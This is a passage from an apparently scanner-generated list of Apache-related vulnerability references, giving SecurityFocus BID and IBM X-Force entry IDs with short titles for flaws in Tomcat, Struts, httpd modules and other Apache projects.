6412| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
6413| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
6414| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
6415| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
6416| [44616] Apache Shiro Directory Traversal Vulnerability
6417| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
6418| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
6419| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
6420| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
6421| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
| [20527] Apache Mod_TCL Remote Format String Vulnerability
| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
| [19106] Apache Tomcat Information Disclosure Vulnerability
| [18138] Apache James SMTP Denial Of Service Vulnerability
| [17342] Apache Struts Multiple Remote Vulnerabilities
| [17095] Apache Log4Net Denial Of Service Vulnerability
| [16916] Apache mod_python FileSession Code Execution Vulnerability
| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
| [14106] Apache HTTP Request Smuggling Vulnerability
| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
| [11471] Apache mod_include Local Buffer Overflow Vulnerability
| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
| [11094] Apache mod_ssl Denial Of Service Vulnerability
| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
| [10478] ClueCentral Apache Suexec Patch Security Weakness
| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
| [9921] Apache Connection Blocking Denial Of Service Vulnerability
| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
| [9733] Apache Cygwin Directory Traversal Vulnerability
| [9599] Apache mod_php Global Variables Information Disclosure Weakness
| [9590] Apache-SSL Client Certificate Forging Vulnerability
| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
| [8898] Red Hat Apache Directory Index Default Configuration Error
| [8883] Apache Cocoon Directory Traversal Vulnerability
| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
| [8707] Apache htpasswd Password Entropy Weakness
| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
| [8226] Apache HTTP Server Multiple Vulnerabilities
| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
| [7255] Apache Web Server File Descriptor Leakage Vulnerability
| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
| [6939] Apache Web Server ETag Header Information Disclosure Weakness
| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
| [6117] Apache mod_php File Descriptor Leakage Vulnerability
| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
| [5992] Apache HTDigest Insecure Temporary File Vulnerability
| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
| [5485] Apache 2.0 Path Disclosure Vulnerability
| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
| [4437] Apache Error Message Cross-Site Scripting Vulnerability
| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
| [3596] Apache Split-Logfile File Append Vulnerability
| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
| [3169] Apache Server Address Disclosure Vulnerability
| [3009] Apache Possible Directory Index Disclosure Vulnerability
| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
| [2216] Apache Web Server DoS Vulnerability
| [2182] Apache /tmp File Race Vulnerability
| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
| [1821] Apache mod_cookies Buffer Overflow Vulnerability
| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
| [1457] Apache::ASP source.asp Example Script Vulnerability
| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86258] Apache CloudStack text fields cross-site scripting
| [85983] Apache Subversion mod_dav_svn module denial of service
| [85875] Apache OFBiz UEL code execution
| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
| [85871] Apache HTTP Server mod_session_dbd unspecified
| [85756] Apache Struts OGNL expression command execution
| [85755] Apache Struts DefaultActionMapper class open redirect
| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
| [85574] Apache HTTP Server mod_dav denial of service
| [85573] Apache Struts Showcase App OGNL code execution
| [85496] Apache CXF denial of service
| [85423] Apache Geronimo RMI classloader code execution
| [85326] Apache Santuario XML Security for C++ buffer overflow
| [85323] Apache Santuario XML Security for Java spoofing
| [85319] Apache Qpid Python client SSL spoofing
| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
| [84952] Apache Tomcat CVE-2012-3544 denial of service
| [84763] Apache Struts CVE-2013-2135 security bypass
| [84762] Apache Struts CVE-2013-2134 security bypass
| [84719] Apache Subversion CVE-2013-2088 command execution
| [84718] Apache Subversion CVE-2013-2112 denial of service
| [84717] Apache Subversion CVE-2013-1968 denial of service
| [84577] Apache Tomcat security bypass
| [84576] Apache Tomcat symlink
| [84543] Apache Struts CVE-2013-2115 security bypass
| [84542] Apache Struts CVE-2013-1966 security bypass
| [84154] Apache Tomcat session hijacking
| [84144] Apache Tomcat denial of service
| [84143] Apache Tomcat information disclosure
| [84111] Apache HTTP Server command execution
| [84043] Apache Virtual Computing Lab cross-site scripting
| [84042] Apache Virtual Computing Lab cross-site scripting
| [83782] Apache CloudStack information disclosure
| [83781] Apache CloudStack security bypass
| [83720] Apache ActiveMQ cross-site scripting
| [83719] Apache ActiveMQ denial of service
| [83718] Apache ActiveMQ denial of service
| [83263] Apache Subversion denial of service
| [83262] Apache Subversion denial of service
| [83261] Apache Subversion denial of service
| [83259] Apache Subversion denial of service
| [83035] Apache mod_ruid2 security bypass
| [82852] Apache Qpid federation_tag security bypass
| [82851] Apache Qpid qpid::framing::Buffer denial of service
| [82758] Apache Rave User RPC API information disclosure
| [82663] Apache Subversion svn_fs_file_length() denial of service
| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
| [82641] Apache Qpid AMQP denial of service
| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
| [82618] Apache Commons FileUpload symlink
| [82360] Apache HTTP Server manager interface cross-site scripting
| [82359] Apache HTTP Server hostnames cross-site scripting
| [82338] Apache Tomcat log/logdir information disclosure
| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
| [82268] Apache OpenJPA deserialization command execution
| [81981] Apache CXF UsernameTokens security bypass
| [81980] Apache CXF WS-Security security bypass
| [81398] Apache OFBiz cross-site scripting
| [81240] Apache CouchDB directory traversal
| [81226] Apache CouchDB JSONP code execution
| [81225] Apache CouchDB Futon user interface cross-site scripting
6787| [81225] Apache CouchDB Futon user interface cross-site scripting
6788| [81211] Apache Axis2/C SSL spoofing
6789| [81167] Apache CloudStack DeployVM information disclosure
6790| [81166] Apache CloudStack AddHost API information disclosure
6791| [81165] Apache CloudStack createSSHKeyPair API information disclosure
6792| [80518] Apache Tomcat cross-site request forgery security bypass
6793| [80517] Apache Tomcat FormAuthenticator security bypass
6794| [80516] Apache Tomcat NIO denial of service
6795| [80408] Apache Tomcat replay-countermeasure security bypass
6796| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
6797| [80317] Apache Tomcat slowloris denial of service
6798| [79984] Apache Commons HttpClient SSL spoofing
6799| [79983] Apache CXF SSL spoofing
6800| [79830] Apache Axis2/Java SSL spoofing
6801| [79829] Apache Axis SSL spoofing
6802| [79809] Apache Tomcat DIGEST security bypass
6803| [79806] Apache Tomcat parseHeaders() denial of service
6804| [79540] Apache OFBiz unspecified
6805| [79487] Apache Axis2 SAML security bypass
6806| [79212] Apache Cloudstack code execution
6807| [78734] Apache CXF SOAP Action security bypass
6808| [78730] Apache Qpid broker denial of service
6809| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
6810| [78563] Apache mod_pagespeed module unspecified cross-site scripting
6811| [78562] Apache mod_pagespeed module security bypass
6812| [78454] Apache Axis2 security bypass
6813| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
6814| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
6815| [78321] Apache Wicket unspecified cross-site scripting
6816| [78183] Apache Struts parameters denial of service
6817| [78182] Apache Struts cross-site request forgery
6818| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
6819| [77987] mod_rpaf module for Apache denial of service
6820| [77958] Apache Struts skill name code execution
6821| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
6822| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
6823| [77568] Apache Qpid broker security bypass
6824| [77421] Apache Libcloud spoofing
6825| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
6826| [77046] Oracle Solaris Apache HTTP Server information disclosure
6827| [76837] Apache Hadoop information disclosure
6828| [76802] Apache Sling CopyFrom denial of service
6829| [76692] Apache Hadoop symlink
6830| [76535] Apache Roller console cross-site request forgery
6831| [76534] Apache Roller weblog cross-site scripting
6832| [76152] Apache CXF elements security bypass
6833| [76151] Apache CXF child policies security bypass
6834| [75983] MapServer for Windows Apache file include
6835| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
6836| [75558] Apache POI denial of service
6837| [75545] PHP apache_request_headers() buffer overflow
6838| [75302] Apache Qpid SASL security bypass
6839| [75211] Debian GNU/Linux apache 2 cross-site scripting
6840| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
6841| [74871] Apache OFBiz FlexibleStringExpander code execution
6842| [74870] Apache OFBiz multiple cross-site scripting
6843| [74750] Apache Hadoop unspecified spoofing
6844| [74319] Apache Struts XSLTResult.java file upload
6845| [74313] Apache Traffic Server header buffer overflow
6846| [74276] Apache Wicket directory traversal
6847| [74273] Apache Wicket unspecified cross-site scripting
6848| [74181] Apache HTTP Server mod_fcgid module denial of service
6849| [73690] Apache Struts OGNL code execution
6850| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
6851| [73100] Apache MyFaces in directory traversal
6852| [73096] Apache APR hash denial of service
6853| [73052] Apache Struts name cross-site scripting
6854| [73030] Apache CXF UsernameToken security bypass
6855| [72888] Apache Struts lastName cross-site scripting
6856| [72758] Apache HTTP Server httpOnly information disclosure
6857| [72757] Apache HTTP Server MPM denial of service
6858| [72585] Apache Struts ParameterInterceptor security bypass
6859| [72438] Apache Tomcat Digest security bypass
6860| [72437] Apache Tomcat Digest security bypass
6861| [72436] Apache Tomcat DIGEST security bypass
6862| [72425] Apache Tomcat parameter denial of service
6863| [72422] Apache Tomcat request object information disclosure
6864| [72377] Apache HTTP Server scoreboard security bypass
6865| [72345] Apache HTTP Server HTTP request denial of service
6866| [72229] Apache Struts ExceptionDelegator command execution
6867| [72089] Apache Struts ParameterInterceptor directory traversal
6868| [72088] Apache Struts CookieInterceptor command execution
6869| [72047] Apache Geronimo hash denial of service
6870| [72016] Apache Tomcat hash denial of service
6871| [71711] Apache Struts OGNL expression code execution
6872| [71654] Apache Struts interfaces security bypass
6873| [71620] Apache ActiveMQ failover denial of service
6874| [71617] Apache HTTP Server mod_proxy module information disclosure
6875| [71508] Apache MyFaces EL security bypass
6876| [71445] Apache HTTP Server mod_proxy security bypass
6877| [71203] Apache Tomcat servlets privilege escalation
6878| [71181] Apache HTTP Server ap_pregsub() denial of service
6879| [71093] Apache HTTP Server ap_pregsub() buffer overflow
